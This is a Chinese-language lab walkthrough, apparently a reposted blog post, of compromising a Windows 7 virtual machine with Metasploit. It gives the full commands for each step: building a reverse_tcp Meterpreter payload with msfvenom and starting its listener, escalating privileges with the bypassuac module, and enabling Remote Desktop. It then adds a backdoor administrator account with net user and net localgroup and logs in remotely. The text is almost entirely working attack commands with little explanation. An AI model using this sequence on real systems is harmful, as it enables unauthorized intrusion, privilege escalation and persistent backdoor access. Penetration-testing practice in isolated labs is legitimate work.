[huayang]
攻击机:
kali:172.16.181.8
win sever2012 :172.16.181.4
目标机:
win7:172.16.181.9
建立连接
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.181.8 LPORT=4444 -f exe -o 123.exe
把马放入目标机,因为我的虚拟机有点小问题,不能用samba打就直接放马
kali开启监听
use exploit/multi/handler
set lhost 172.16.181.8 //攻击机ip
set payload windows/meterpreter/reverse_tcp
run
目标机双击马儿即可建立连接
提权
查看自己的权限是否为管理员权限
getuid
当前是user权限要管理员权限才能开启3389
这里要用到bypassuac提权
用background保存到后台,加载bypassuac
use exploit/windows/local/bypassuac
set session 2
run
可以看见已经是管理员权限了
开启远程桌面
run post/windows/manage/enable_rdp
用nmap验证一下
创建用户
进入shell
net user huazai 123 /add
将用户提升到管理员权限
net localgroup administrators huazai /add
最后再查看一下
net user
可以看见已经成功添加了
来到win sever,直接打开mstsc
输入目标机的ip和用户名,密码连接即可
成功连接
在kali里rdesktop也是可以开启远程访问的
[/huayang]
FROM:浅浅淡淡[hellohy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论